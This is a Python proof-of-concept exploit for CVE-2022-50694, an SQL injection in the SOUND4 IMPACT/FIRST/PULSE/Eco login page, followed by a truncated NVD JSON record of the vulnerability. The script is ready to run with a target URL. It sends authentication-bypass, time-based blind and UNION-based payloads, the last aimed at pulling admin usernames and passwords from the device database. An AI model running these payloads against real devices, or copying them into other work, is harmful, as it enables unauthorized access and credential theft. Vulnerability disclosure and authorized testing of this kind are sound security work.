CVE-2022-50694

import requests import sys # CVE-2022-50694 SQL Injection PoC for SOUND4 IMPACT/FIRST/PULSE/Eco # Target: /index.php (login page) # Vulnerability: SQL Injection in 'username' POST parameter def exploit_sqli(target_url, payload): """ Exploit SQL injection vulnerability in SOUND4 login page Args: target_url: Base URL of the target SOUND4 device payload: SQL injection payload to inject Returns: Response from the server """ login_url = f"{target_url.rstrip('/')}/index.php" # Prepare POST data with SQL injection payload in username field data = { 'username': payload, 'password': 'any_password', 'submit': 'Login' } headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' } try: response = requests.post(login_url, data=data, headers=headers, timeout=30, verify=False) return response except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return None def test_blind_sqli(target_url): """ Test for blind/time-based SQL injection """ # Time-based blind SQL injection payload (MySQL) true_payload = "admin' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END) AND '1'='1" false_payload = "admin' AND (SELECT CASE WHEN (1=2) THEN SLEEP(5) ELSE 0 END) AND '1'='1" print("[*] Testing blind SQL injection...") print(f"[*] True condition payload: {true_payload}") # Test with a simple boolean-based payload bool_payload = "admin' OR '1'='1' -- " print(f"[*] Boolean bypass payload: {bool_payload}") response = exploit_sqli(target_url, bool_payload) if response and response.status_code == 200: print("[+] Payload sent successfully") print(f"[+] Response length: {len(response.text)} bytes") return True return False def extract_admin_creds(target_url): """ Attempt to extract admin credentials using UNION-based injection """ # UNION-based injection to extract admin table data union_payload = "admin' UNION SELECT 1,2,3,4,username,password,7,8,9 FROM admin WHERE '1'='1" print("[*] Attempting UNION-based injection for credential extraction...") response = exploit_sqli(target_url, union_payload) if response: print(f"[+] Response received: {len(response.text)} bytes") # Check for common admin patterns in response if 'admin' in response.text.lower() or 'dashboard' in response.text.lower(): print("[+] Potential admin access detected!") return True return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2022-50694.py <target_url>") print("Example: python cve-2022-50694.py http://192.168.1.100") sys.exit(1) target = sys.argv[1] print(f"[*] CVE-2022-50694 SQL Injection PoC") print(f"[*] Target: {target}") print("-" * 50) # Run tests test_blind_sqli(target) print("-" * 50) extract_admin_creds(target) print("\n[!] Disclaimer: This PoC is for authorized testing only")

{"cve": {"id": "CVE-2022-50694", "sourceIdentifier": "[email protected]", "published": "2025-12-30T23:15:44.723", "lastModified": "2026-01-16T19:16:10.677", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x contains an SQL injection vulnerability in the 'username' POST parameter of index.php that allows attackers to manipulate database queries. Attackers can inject arbitrary SQL code through the username parameter to bypass authentication and potentially access unauthorized database information."}, {"lang": "es", "value": "SOUND4 IMPACT/FIRST/PULSE/Eco &lt;=2.x contiene una vulnerabilidad de inyección SQL en el parámetro POST 'username' de index.php que permite a los atacantes manipular consultas de base de datos. Los atacantes pueden inyectar código SQL arbitrario a través del parámetro 'username' para eludir la autenticación y potencialmente acceder a información no autorizada de la base de datos."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sound4:impact_firmware:2.15:*:*:*:*:*:*:*", "matchCriteriaId": "33C347FE-DA7B-4137-87B8-E6A8AF4D307F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sound4:impact:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "0A735654-A166-4B56-BF4D-F165B7E11043"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sound4:impact_firmware:1.69:*:*:*:*:*:*:*", "matchCriteriaId": "5C4CF02A-8CF1-46FF-9EC0-FF779D60B6EA"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sound4:impact:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "EC9BD81B-573A-4DA7-AC47-6C8AF1B6B18F"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sound4:pulse_firmware:2.15:*:*:*:*:*:*:*", "matchCriteriaId": "18E34118-F11B-4BF2-BE23-7DAE0A6790FB"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sound4:pulse:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "C46BF88C-955C-4F9E-B782-1EADA068F19D"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vuln ... (truncated)